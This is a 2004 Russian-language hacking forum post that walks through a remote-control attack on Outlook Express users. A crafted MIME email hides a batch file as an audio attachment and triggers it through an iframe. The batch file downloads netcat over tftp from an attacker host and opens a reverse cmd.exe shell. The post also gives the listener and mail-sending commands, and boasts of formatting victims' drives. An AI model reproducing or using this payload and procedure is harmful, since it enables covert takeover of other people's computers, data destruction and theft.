Удаленный контроль

Discussion in 'Уязвимости Mail-сервисов' started by Ламер-----, 22 Jul 2004.

  1. Ламер-----

    Joined:
    21 Jul 2004
    Messages:
    27
    Likes Received:
    0
    Reputations:
    0
    И так создаем hack.txt, с таким вот MIME-кодом.

    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">hello hacker-4.comcor-tv.ru
    mail from:<[email protected]>
    rcpt to:<[email protected]>
    data
    subject: Attack
    MIME-Version: 1.0
    Content-Type: multipart/related; type="multipart/alternative"
    boundary="1"
    X_Priority:3
    X-Mail-Priority:Normal
    X-Usenet:1

    --1

    Content-Type:multipart/alternative; boundary="2"

    --2

    Content-Type: text/html; charset="iso-8859-1"
    Content-Transfer-Encoding: quoted-printable

    <html>
    <head>
    </head>
    <body bgcolor=3D#ffffff>
    <iframe src=3Dcid:THE-CID height=3D0></iframe>
    =)))
    </body>
    </html>

    --2--

    --1

    Content-Type: audio/x-wav; name="attack.bat"
    Content-Transfer-Encoding: quoted-printable
    Content-ID: <THE-CID>

    start /B /WAIT tftp -i hacker-4.comcor-tv.ru get nc.exe
    C:\winnt\system32\nc.exe
    start /B nc.exe -d -e cmd.exe hacker-4.comcor-tv.ru 2002
    --1
    .
    quit[/QUOTE]<span id='postcolor'>

    Вот это наш Активный код </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">start /B /WAIT tftp -i hacker-4.comcor-tv.ru get nc.exe
    C:\winnt\system32\nc.exe
    start /B nc.exe -d -e cmd.exe hacker-4.comcor-tv.ru 2002[/QUOTE]<span id='postcolor'>
    В первой строке команда запускает сеанс МС_ДОС без создания нового диалога.
    В открывшемся сеансе МС_ДОС сначало исполняется команда tftp предназначеная для выгрузки файлов из локального компа на удаленный хост (параметр put) и загрузки файлов из уделенного хоста на локальный комп (параметр get).
    У нас команда tftp загружает двоичный код (параметр -i) с нашего хоста по адресу hacker-4.comcor-tv.ru в папку c\winnt\nc.exe локального компа.
    Во второй строке происходит запуск загруженной проги-сервера netcat которая запускает командную оболочку cmd.exe атакованного компа и устанавливает соединение с прогой-клиентом netcate запущеной на нашем хосте в режими прослушки 2002 порта.
    Файл hack.txt готов?  [​IMG]
    Тогда запускаем прогу TFTPD32 представляющую собой клиент TFTP (для танкистов:Прога обслуживающая запросы TFTP)
    Почему используем TFTPD32? Потому что на компах с вынь 2000\ХР в отличии от Никса,протокол TFTP поддерживается в ограниченом обьеме и для исполнения команды tftp на хосте с которого мы собираемся загрузить файл должен быть установлен клиент tftp - ( танкистам &quot; иначе команда нихера исполнятся не будет) [​IMG]
    И так мы запускаем TFTPD32 и нам отображается некий диалог.
    Клиент TFTPD32 должен быть настроин следующим образом.
    В поле Base Directory (надо указать папку с файлом nc.exe)(для танкистов c\winnt\nc.exe)
    В списке Server interface (надо ввести Ip адрес сетевого хоста с которого будет выполняться загрузка файла.) (снова для танкистов IP следует ввести свой)
    После запуска и настройки проги,начинается прослушка стандартного порта (69) протокола TFTP в ожидании запросов.
    Далее
    В отдельном диалоге сеанса МС_ДОС запускаем следующую прогу-клиента удаленного управления.
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">nc-vv-L-p 2002[/QUOTE]<span id='postcolor'>
    Вылезит такое сообщение

    listening on (any) 2002 (снова танкистам =) началась
    работа в режиме клиента удаленного

    управления,прослушивающего запросы к порту 2002,поступающие с любого хоста)
    Далее
    Открываем ещё один диалог сеанса МС_ДОС и с помощью вот этой команды
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">type hack.txt | nc-vv [email protected] 25[/QUOTE]<span id='postcolor'> Если все сраслось по плану и жертва открыла письмо в Аутлук Експрес (на других не тестировалось)
    На его экране на милисекунду появится диалог сеанса МС_ДОС. То в диалоге клиента TFTPD32 (т.е у тебя) Должны отобразиться сообщения о ходе процесса загрузки файла.
    Пример.

    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">Connection received from xx.xx.xxx. port xx
    Read request for fail <nc.exe> Mode octet
    <nc.exe>: send 118 blks, xxxx bytes in 1 s. 0 blk resent[/QUOTE]<span id='postcolor'>

    Одновременно в диалоге сеанса МС_ДОС в котором запущен клиент удаленного управления netcate отобразится сообщение об установлении связи с атакованным компом.

    теперь с хостом можно делать,что хочеш.
    Форматить диски,удалять файлы,и.т.д
    Одним словом жертва превращена в твоего стевого раба.